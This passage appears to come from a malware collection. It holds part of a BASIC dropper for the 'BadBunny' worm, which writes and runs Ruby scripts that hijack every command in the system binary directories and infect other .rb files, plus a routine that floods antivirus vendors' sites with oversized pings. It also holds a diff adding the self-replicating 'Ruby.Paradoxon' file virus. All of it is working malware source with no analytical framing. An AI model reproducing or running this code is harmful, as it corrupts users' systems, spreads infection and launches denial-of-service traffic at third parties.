print #1,"require 'ftools'"
print #1,"def replacecmd(cmdname, dirpath)"
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
print #1,"oldcmd.puts ""puts \""\"""""
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""3\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""2\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""1\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""for $args in $* do"""
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
print #1,"oldcmd.puts ""end"""
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
print #1,"oldcmd.puts ""exit 0"""
print #1,"end"
print #1,"$binary_dirs = Array.new"
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
print #1,"for $dir in $binary_dirs do"
print #1,"if File.directory?($dir) then"
print #1,"if File.writable?($dir) then"
print #1,"Dir.open($dir).each do |file|"
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
print #1,"replacecmd(file, $dir)"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"exit 0"
close #1
Shell("badbunny.rb",0)
end sub
sub two() 'thx to SPTH for this...
Open "badbunnya.rb" For Output As #2
print #2,"# BADB"
print #2,"mycode="""
print #2,"mych=File.open(__FILE__)"
print #2,"myc=mych.read(1)"
print #2,"while myc!=nil"
print #2,"mycode+=myc"
print #2,"myc=mych.read(1)"
print #2,"end"
print #2,"mycode=mycode[mycode.length-734,734]"
print #2,"cdir = Dir.open(Dir.getwd)"
print #2,"cdir.each do |a|"
print #2,"if File.ftype(a)==""file"" then"
print #2,"if a[a.length-3, a.length]=="".rb"" then"
print #2,"if a!=File.basename(__FILE__) then"
print #2,"fcode="""
print #2,"fle=open(a)"
print #2,"badb=fle.read(1)"
print #2,"while badb!=nil"
print #2,"fcode+=badb"
print #2,"badb=fle.read(1)"
print #2,"end"
print #2,"fle.close"
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
print #2,"fcode=fcode+13.chr+10.chr+mycode"
print #2,"fle=open(a,""w"")"
print #2,"fle.print fcode"
print #2,"fle.close"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"cdir.close"
close #2
Shell("badbunnya.rb",0)
End Sub
sub ping()
Shell("ping -l 5000 -t www.ikarus.at",0)
Shell("ping -l 5000 -t www.aladdin.com",0)
Shell("ping -l 5000 -t www.norman.no",0)
Shell("ping -l 5000 -t www.norman.com",0)
Shell("ping -l 5000 -t www.kaspersky.com",0)
Shell("ping -l 5000 -t www.kaspersky.ru",0)
Shell("ping -l 5000 -t www.kaspersky.pl",0)
Shell("ping -l 5000 -t www.grisoft.cz",0)
Shell("ping -l 5000 -t www.symantec.com",0)
Shell("ping -l 5000 -t www.proantivirus.com",0)
Shell("ping -l 5000 -t www.f-secure.com",0)
Shell("ping -l 5000 -t www.sophos.com",0)
Shell("ping -l 5000 -t www.arcabit.pl",0)
Shell("ping -l 5000 -t www.arcabit.com",0)
Shell("ping -l 5000 -t www.avira.com",0)
Shell("ping -l 5000 -t www.avira.de",0)
Shell("ping -l 5000 -t www.avira.ro",0)
Shell("ping -l 5000 -t www.avast.com",0)
Shell("ping -l 5000 -t www.virusbuster.hu",0)
Shell("ping -l 5000 -t www.trendmicro.com",0)
Shell("ping -l 5000 -t www.bitdefender.com",0)
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
Shell("ping -l 5000 -t www.drweb.com",0)
Shell("ping -l 5000 -t www.drweb.ru",0)
Shell("ping -l 5000 -t www.viruslist.com",0)
end sub
Ruby/Virus.Ruby.Pydoxon.b
+26
View File
@@ -0,0 +1,26 @@
# RUBY.Paradoxon
mycode=File.open(__FILE__).read(630)
cdir = Dir.open(Dir.getwd)
cdir.each do |a|
if File.ftype(a)=="file" then
if a[a.length-3, a.length]==".rb" then
if a!=File.basename(__FILE__) then
fcode=""
fle=open(a)
spth=fle.read(1)
while spth!=nil
fcode+=spth
spth=fle.read(1)
end
fle.close
if fcode[7,9]!="Paradoxon" then
fcode=mycode+13.chr+10.chr+fcode
fle=open(a,"w")
fle.print fcode
fle.close
end
end
end
end
end
cdir.close